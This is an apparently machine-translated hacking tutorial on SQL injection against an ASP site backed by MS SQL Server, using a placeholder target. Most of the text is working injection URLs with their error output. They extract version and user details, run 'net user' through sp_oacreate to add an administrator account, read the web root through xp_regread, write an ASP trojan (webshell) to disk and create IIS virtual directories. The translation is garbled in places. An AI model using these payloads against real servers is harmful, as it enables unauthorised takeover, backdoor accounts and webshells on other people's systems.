Wind and transformation network, network
Safety makes people can't pay attention to it. The database allows us to think of powerful Oracle, MS SQL. Microsoft
The most vulnerability, use SQL Injection today to let MS SQL work well.
Below (using a well-known website as a test point), I believe everyone has mastered the SQL explosion, explosions, and explosions. It is not much here to say this here.
MS SQL built-in function introduction:
@@ Version gets the version number of Windows, the version number, patch of MS SQL. User_name () Gets the connection user DB_NAME () of the current system to get the currently connected database host_name () get the name of the current host
This information helps us understand your system.
Ok, let's get started!
Statement: http://www.xxx.com/list.asp?classid=1 'Return Information: Microsoft OLE DB Provider for SQL Server Error' 80040E14 'String' ORDER BY ID DESC 'There is no closed quotation number before. /List.asp, line 290
From the quotation marks ("') from here, we can determine that there is SQL INJECTION. It is found that in the vulnerability of course, then uses the functions described above for us:
Statement: http://www.xxx.com/list.asp?classid=1 and 0 <> (SELECT @@ version) - Back: Microsoft Ole DB Provider for SQL Server Error '80040E07' Put NVARCHAR VAT 'Microsoft SQL Server 2000 - 8.00.760 (Intel x86) DEC 17 2002 14:22:05 CopyRight (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4) 'When converted to the data type Int A syntax error occurred. /List.asp, line 290
Related information, MS Server A
DVANCED Server 2000 SP4, SQL 2000 SP3, 8.00.760 from MS SQL Server can be seen as a SP3 patch. Look at the information of the server, you should know the authority of the database:
Statement: http://www.xxx.com/list.asp? Classid = 1 and user_name () = 'dbo' Return: Information Normal Returns
OK is that the permissions are DBO, and the connection users from surface DBO permissions often involve members of the SYSADMIN server. Note The database server role member group defaults to add a DBO user at each database.
Returns the principle root 1 = 1, 1 = 2 Similar .. Here is just permission testing, we also explode it to see:
Statement: http://www.xxx.com/list.asp?classid=1 and 0 <> (SELECT User_name ()) - Back: Microsoft Ole DB Provider for SQL Server Error '80040E07' Transfer NVARCHAR Value 'DBO' A syntax error occurs when the data type is an int. /List.asp, row 290 Describes that the user permission to connect to the database is high, and it can be determined as members of the server role group.
Statement: http://www.xxx.com/list.asp? Classid = 1 and 0 <> (SELECT DB_NAME ()) - Back: Microsoft OLE DB Provider for SQL Server Error '80040E07' Transfer NVARCHAR Value 'GameImgsys' A syntax error occurs when the data type is an int. /List.asp, line 290
This will explode the current database. Get such high privileges database connection members, and we certainly want to get Webshell directly, or get NT Admin for NT Admin. Nt Admin Lin depends on the configuration of the current server. If you configure an unreasonable server, we have to take Nt Admin in directly, take NT Admin to use:
MSSQL built-in stored procedure:
SP_OACREATE (through it, harm is very bigger, but you need to have Sysadmins permission to use) SP_OAGETERRORINFO SP_OAGETPROPERTY SP_OAMETHOD SP_OASETPROPERTY SP_SETPROPERTYSP_OASTOP
Since MS SQL can perform multi-statements, we have the opportunity to use more statements.
Statement: http://www.xxx.com/list.asp?classid=1; declare @Shell int exec sp_oacreate 'wscript.shell', @ shell outprut exec sp_oamethod @ shell, 'run', null, 'C: / Winnt / System32 / cmd.exe / c net user cntest chinaatest / add 'is returned normally. (Tip: If the shell is exist on the host, it will create a csest user on the server)
Create a user, then add a NET LOCALGROUP Administrators CNTEST / Add to the management group. If the other party has a 3389 port, or if the IPC, then there is no need to say more.
When you encounter a professional host, just open an 80-port, what should I do? Of course, we may still get WebShell, slowly penetrate.
Due to high authority, we may build a table first, write
ASP
Trojan data is passed by Makewe
BTASK, get Websehll. Handmade program is too lock, upload WebShell's biggest problem or web directory, now there is ready-made tool to get webshell by backup, and Maskwebtask tools. WebShell. The following recommendation is obtained, get the webpage path (read by the stored procedure to the registry):
Use the built-in stored procedure XP_regread (read the registry key value, permission public):
Statement: http://www.xxx.com/list.asp? Classid = 1; Create Table NewTable (ID Int Id IDETY (1, 1), Paths Varchar (500)) Declare @test Varchar (20) Exec Master .. xp_regread @ rootkey = 'HKEY_LOCAL_MACHINE', @ key = 'SYSTEM / CurrentControlSet / Services / W3SVC / Parameters / Virtual Roots /', @value_name = '/', values = @ test OUTPUT insert into paths (path) values (@test) IIS's default path in the registry HKEY_LOCAL_MACHINE / SYSTEM / CURRENTCONTROLSET / SERVICES / W3SVC / Parameters / Virtual ROOTS /
Read the value of the database using the explosion section:
Statement: http://www.xxx.com/list.asp? Classid = 1 and 0 <> (Select Top 1 Paths from NewTable) - Return: Microsoft Ole DB Provider for ODBC Drivers Error '80040E07' [Microsoft] [ ODBC SQL Server Driver] [SQL Server] transitions VARCHAR VET 'E: / WWW,, 201' to the column of data type INT is a syntax error.
This shows that the web directory is in E: / WWW, followed by FSO to write directly to the ASP Trojan (prompt must use the sysadmin permission to use FSO and FSO to open it):
Statement: http://www.xxx.com/list.asp? Class = 1; declare% 20 @ o% 20INT,% 20 @ f% 20INT,% 20 @ T% 20INT,% 20 @ Ret% 20INT% 20EXEC % 20sp_oacreate% 20'scripting.FilesystemObject ',% 20 @ o% 20Ot% 20exec% 20sp_oamethod% 20 @ o,% 20'createTextFile',% 20 @ f% 20Out,% 20'e: / www/test.asp ' 1% 20exec% 20 @ RET% 20 =% 20sp_oAmethod% 20 @ f,% 20'writeLine ',% 20null,% 20'on error resume next'
Create a Test.asp under E: / WWW and write to the ON Error Resume Next statement:
http://www.xxx.com/list.asp?classid=1; Declare @o INT , @t Exec sp_oacreate20Exec sp_oacreate20Exec sp_oacreate % 20'Scripting.FileSystemObject ',% 20 @ o% 20Ot% 20EXEC% 20sp_oamethod% 20 @ o,% 20'OpenTextFile',% 20 @ f% 20Out,% 20'e: /www/test.asp' ,8 % 20exec% 20 @ RET% 20 =% 20sp_oamethod% 20 @ f,% 20'WriteLine ',% 20nULL,% 20'ASP Horse' - Add a line of records in E: /WW /TEST.ASP, recorded as ASP HORSE, Whole full Trojans may be written like this. (% Percent sign must be written with% 25). If you don't get a web directory, what should I do? Premise You have to guess whether the website uses the default web, or uses the domain name as the web.
Declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', null, 'cscript.exe c: /inetpub/wwroot/mkwebdir.vbs -w "default Web site" -v " e "," e: / "'
Create a virtual directory E in the default Web site, pointing to E: Under the disc.
Declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', null, 'cscript.exe c: /inetpub/wwroot/chaccess.vbs -a w3svc / 1 / root / e Browse '
Give the virtual directory E to browse properties. Give yourself a virtual service. Think about those web directory paths, the heads are broken. This will open your eyes a day. The transfer of WebShell used MS SQL to tell our work, and the next job should be coming by you.
